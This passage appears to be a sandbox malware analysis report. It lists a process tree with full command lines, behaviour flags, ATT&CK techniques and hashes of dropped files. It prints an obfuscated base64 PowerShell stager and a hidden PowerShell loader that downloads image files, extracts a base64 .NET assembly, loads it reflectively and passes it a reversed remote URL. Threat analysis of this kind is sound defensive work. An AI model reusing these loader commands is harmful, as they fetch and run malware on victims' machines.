QBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre4DgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDIDgTreNQDgTre4DgTreDgDgTreNDgTreDgTre2DgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre5DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreD8DgTreMQDgTre3DgTreDEDgTreMgDgTre1DgTreDgDgTreODgTreDgTre1DgTreDDgTreDgTreMDgTreDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreBEDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreRDgTreBhDgTreHQDgTreYQBGDgTreHIDgTrebwBtDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreC0DgTrebgBlDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEUDgTrebgBjDgTreG8DgTreZDgTreBpDgTreG4DgTreZwBdDgTreDoDgTreOgBVDgTreFQDgTreRgDgTre4DgTreC4DgTreRwBlDgTreHQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreFMDgTreVDgTreBBDgTreFIDgTreVDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreRQBODgTreEQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTreZQDgTregDgTreDDgTreDgTreIDgTreDgTretDgTreGEDgTrebgBkDgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTredDgTreDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreCsDgTrePQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreUwB1DgTreGIDgTrecwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreLDgTreDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreQwBvDgTreG4DgTredgBlDgTreHIDgTredDgTreBdDgTreDoDgTreOgBGDgTreHIDgTrebwBtDgTreEIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCkDgTreOwDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBSDgTreGUDgTreZgBsDgTreGUDgTreYwB0DgTreGkDgTrebwBuDgTreC4DgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreF0DgTreOgDgTre6DgTreEwDgTrebwBhDgTreGQDgTreKDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTregDgTreD0DgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTreuDgTreEcDgTreZQB0DgTreFQDgTreeQBwDgTreGUDgTreKDgTreDgTrenDgTreFDgTreDgTreUgBPDgTreEoDgTreRQBUDgTreE8DgTreQQBVDgTreFQDgTreTwBNDgTreEEDgTreQwBBDgTreE8DgTreLgBWDgTreEIDgTreLgBIDgTreG8DgTrebQBlDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTreVgBBDgTreEkDgTreJwDgTrepDgTreC4DgTreSQBuDgTreHYDgTrebwBrDgTreGUDgTreKDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreLDgTreDgTregDgTreFsDgTrebwBiDgTreGoDgTreZQBjDgTreHQDgTreWwBdDgTreF0DgTreIDgTreDgTreoDgTreCcDgTredDgTreB4DgTreHQDgTreLgBGDgTreE0DgTreSDgTreDgTrevDgTreDDgTreDgTreODgTreDgTrevDgTreDUDgTreNwDgTreuDgTreDDgTreDgTreNgDgTreuDgTreDUDgTreOQDgTreuDgTreDMDgTreMgDgTrevDgTreC8DgTreOgBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBDDgTreDoDgTreXDgTreBQDgTreHIDgTrebwBnDgTreHIDgTreYQBtDgTreEQDgTreYQB0DgTreGEDgTreXDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreTgBFDgTreFcDgTreJwDgTresDgTreCcDgTreUgBlDgTreGcDgTreQQBzDgTreG0DgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:676

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469', 'https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FMH/08/57.06.59.32//:ptth' , '1' , 'C:\ProgramData\' , 'NEW','RegAsm',''))} }"
4⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2684

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\NEW.vbs
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2056

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
5⤵
- Suspicious use of SetWindowsHookEx
PID:1924

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Exploitation for Client Execution

T1203

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize
1KB

MD5
a266bb7dcc38a562631361bbf61dd11b

SHA1
3b1efd3a66ea28b16697394703a72ca340a05bd5

SHA256
df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

SHA512
0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
44f6962695e7bfdde476bd9bc6301bc5

SHA1
d61787a5cb9627e20e837df326fc460cd6cc2db7

SHA256
ad402685e173d1852e77131f58ae823baec69e5ffcb91d23342dceb3e6749d35

SHA512
bc52a51cd69d4ab83eb7b5a7bf8bd179c2d0ae174ff89df69e1963fa9050690d5efb7fc4c90bada02aac8c309d9b3a6cd5961417de2b0b9424c1d000ce17b7dc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
7d152c0c301a552a48b5c42b5cdf3a9f

SHA1
08994423c0b7cefe329facd297605c2f0336909c

SHA256
294bb968b953f814849c9032dd0d2229fe01cd0d02b43c9bd5add93304469ffe

SHA512
42f06b114c902b7c89278a41bef5c780e2e3cdd573777c60fca332038fc873b57b6c5db901b7e82305b96587b385349a21dbc448621d82701e6f7bc52a3fe149

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize
242B

MD5
783611fa225f5022cd1244f268891d73

SHA1
2b9a59dc819bdef25afc114d98f8f7a4b182b498

SHA256
76d3e572700b1a43f76c76803deb50aa53f885fc4b52f10d0c7e05adf1a30937

SHA512
56ee0bb8e2b3d51f4ac6ec6a6fcd62d4268f20a578eb46a381277c9d6c09a4beefa3115cb6aaeefec250d8ce4908436a43c9e95a72d1ccda3224dad98ad8f20f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{EC774A82-8CAD-4ED0-8F17-5F30C77E7EBA}.FSD
Filesize
128KB

MD5
2b68224e70c317fbb916b7f644ed6c4a

SHA1
b4ed9806679d466ebbb5496f9966d05f2f1640e0

SHA256
7b1b608da2db8445ed3ca0ec12e0a8cc627f365d0fcb5cac0674a6e1d17b39cb

SHA512
ab36d0f17f0d987d3265ac4844cc1914c0c00fd99b2f9e60e3eae33aca90e990c7d4480ae2d2bdb5b161736176214c3b85bd35c762a658c99e954bdacbc4d424

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
Filesize
128KB

MD5
d62c3b7aa07b1a1391391717f199bc41

SHA1
41893bd5b9d76f2d57d988f02c4b62d90ee409ec

SHA256
1f814ca6ca4f333b66f383176aae7f98b9b14d0adccb2e92007b9df1fa16e328

SHA512
c27099269c70e61132d537daaa13bf93fac9f2e8a3154e1e5dad8020992a5a2f4d3f2223bb114ed1f6ee3f7559b850df758facadc5a17a9679ed36576e6d8faf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{EBDCE623-1B2C-48F2-90AD-C88A04EA1E5A}.FSD
Filesize
128KB

MD5
d58af6b647a67774c506ffb380f4cbbb

SHA1
df14e8d90942d14f6c29e388a4bf4efea259ec96

SHA256
e089f21688df3c523ed705a09d365f711838c638d5177e5157846b3c6937d6b6

SHA512
2556b8a4c95a01a26ccf39df27dd9f3642b51162601cc3937cf6bd76ca02c5b3e983aad23af3681d2c673ecb2327d652ebb627e956dee488c2be56ddf8174a4c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SZ2A9SGY\ireallywantakissfrommywifesheisverybeautifulgirlwhoilovealotsheisreallybeautifulgirleveriseenshe___ismybabygirlmylove[1].doc
Filesize
74KB

MD5
9278d07272accaf33d132bb6dbf6a7e7

SHA1
2baca87c9698a70badda973491cdb8fdc82982d5

SHA256
5aebe72f050d5977cccf05c5c21bd56dab2c8caf96b9edcf9b1bcfabcf0702fc

SHA512
34efd47cc1960994b46211979e0f2cc158d3a87d1af61e9d904d28481a3313129100c46556caa9c27e9309aac162a354df8893d1211ca85d17947b8daf5c405e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\366513EC.emf
Filesize
1.4MB

MD5
1fcb3f34b5588f6a647a06dff1811bf9

SHA1
1f5ef0e6e41c14795decedcefc883ab9000fac9a

SHA256
a99e8172248dac0b2a6243d06a862901989857b0c2ecbed5f25ddb0d1a95154e

SHA512
47e951583afff444f9adb09beab0d83f9792b46d3e1fabf05d21068218d64b3cba48e2dc22fe0a7bd3252a0e0c8866faa244b5dc3784bd336ecbc9f2924fb2aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BCEBFBAE.emf
Filesize
1.4MB

MD5
4d59a7e93170340b5ec4009f7fa3ad31

SHA1
e07421156dd87789f93f10904118343ca452bbb5

SHA256
83473215e5c2160333aa92ea7f9b1276d8ed7dd66afc472dc92c88055d189d7d

SHA512
415102ad30df62a63ec47d7b432ab397c2cfc8b6f7fe1e8a7057877379b65d344499089780e089ad2f5c08e3050f4dc2205e7c3c4ffe484c39d067027783ab55

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab6F66.tmp
Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar7062.tmp
Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar71A0.tmp
Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Local\Temp\{10B7568E-E7B0-437A-A812-D759E489A231}
Filesize
128KB

MD5
61d0548705eacddc81de982695bc82f2

SHA1
340b0d7c41689ffd1a87f6df029874b956b155c5

SHA256
6042de1ec2e4b1b8cbc39cd93a85e721a75060f23d201f570cdf23bc5aea05e7

SHA512
4f9575baad05fd3744f36cb6c4ac92469ba7e1d09b6a3818370d8a7e8815c59f59a925125bc89d8e9a84fe2b9cf28bbdd75de7d284f8f679d51708f7ff7bf2fe

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
Filesize
20KB

MD5
433353dc5c787028665dcc09db68ee6a

SHA1
68a1258157e24d6994076c66a890545ea44f5c8f

SHA256
b29f4d2f7a29dd8c4490a7c4cc6b20b833d6c078752d17781e1502c55d2507ac

SHA512
96241ce582eab2cc4e8248a8c1fa98c2cbf7ae8eaa312c6c6d99e45f1a4685cac108be514b73fabf005a8d1498604c240b84b773b6817be0983f272ba3c593a8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
0a369995682ed2ab3fbc489f337d32d7

SHA1
03df46c87011ecd8fa8d41f2b0e94cd9d18b1c61

SHA256
424c5afd479a995862bc2bafb94c29583febfdd681e2867b402fc152b9ca16c3

SHA512
148eac53abe3f35380c0b9fb3111a969520b5c5f3317cf02bc61c480c16d62ebfc4bcbd3ff4648941036f2ffa02510a97996fe451f9c0424c697e885fd680758

Download Submit
C:\Users\Admin\AppData\Roaming\lovetokissherlipswithlovers.vbs
Filesize
111KB

MD5
b6f2e8f16ea682ee7b11b435892d6c35

SHA1
b39f7a6ce6b431ad48730a071eb1b51302d27c74

SHA256
468af92db2b495c239d764db5a846179525f22681d3a813fc6e41cdd9559474d

SHA512
1407041ef5d687be3ffb500f70adc40ba4963a3cdb12da3d506fc523ebd1c8cc54881e50e90bd5db69bb0c5918f7bbf4e32f5922686052aa3a51dfec3c6d0478

Download Submit
C:\Users\Admin\AppData\Roaming\notess\logs.dat
Filesize
384B

MD5
1ad17cafe6548ad6063691143cfa2baf

SHA1
68e3224f4340a543790e71bffd58f31b0521e327

SHA256
2b6a040d7573497f4436f12c4bbc96645c6e73e6b9f8ccde44b42c774367264b

SHA512
be4e00310258d80694f5189da4dce0b9c3099118e4f60fae4decd278a8afa3db64bf463d0feeb7cecb3370a9df92090b45f4124ad4f647c4c25c413b6af88ade

Download Submit
memory/676-175-0x0000000002520000-0x0000000002560000-memory.dmp

Filesize
256KB

Download
memory/676-357-0x000000006A6C0000-0x000000006AC6B000-memory.dmp

Filesize
5.7MB

Download
memory/676-329-0x0000000002520000-0x0000000002560000-memory.dmp

Filesize
256KB

Download
memory/676-176-0x0000000002520000-0x0000000002560000-memory.dmp

Filesize
256KB

Download
memory/676-174-0x000000006A6C0000-0x000000006AC6B000-memory.dmp

Filesize
5.7MB

Download
memory/676-173-0x000000006A6C0000-0x000000006AC6B000-memory.dmp

Filesize
5.7MB

Download
memory/676-316-0x000000006A6C0000-0x000000006AC6B000-memory.dmp

Filesize
5.7MB

Download
memory/1832-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1832-0-0x000000002F681000-0x000000002F682000-memory.dmp

Filesize
4KB

Download
memory/1832-170-0x00000000717ED000-0x00000000717F8000-memory.dmp

Filesize
44KB

Download
memory/1832-2-0x00000000717ED000-0x00000000717F8000-memory.dmp

Filesize
44KB

Download
memory/1832-406-0x00000000717ED000-0x00000000717F8000-memory.dmp

Filesize
44KB

Download
memory/1832-397-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1924-333-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1924-344-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1924-371-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1924-413-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1924-370-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1924-331-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1924-408-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1924-335-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1924-337-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1924-339-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1924-365-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1924-341-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1924-346-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1924-363-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1924-348-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/1924-350-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1924-364-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1924-352-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1924-355-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1924-412-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1924-356-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1924-360-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1924-358-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1924-361-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1924-362-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2056-325-0x00000000027D0000-0x0000000002810000-memory.dmp

Filesize
256KB

Download
memory/2056-328-0x000000006A6C0000-0x000000006AC6B000-memory.dmp

Filesize
5.7MB

Download
memory/2056-324-0x000000006A6C0000-0x000000006AC6B000-memory.dmp

Filesize
5.7MB

Download
memory/2056-323-0x00000000027D0000-0x0000000002810000-memory.dmp

Filesize
256KB

Download
memory/2056-322-0x000000006A6C0000-0x000000006AC6B000-memory.dmp

Filesize
5.7MB

Download
memory/2684-353-0x000000006A6C0000-0x000000006AC6B000-memory.dmp

Filesize
5.7MB

Download
memory/2684-342-0x0000000002600000-0x0000000002640000-memory.dmp

Filesize
256KB

Download
memory/2684-330-0x000000006A6C0000-0x000000006AC6B000-memory.dmp

Filesize
5.7MB

Download
memory/2684-203-0x0000000002600000-0x0000000002640000-memory.dmp

Filesize
256KB

Download
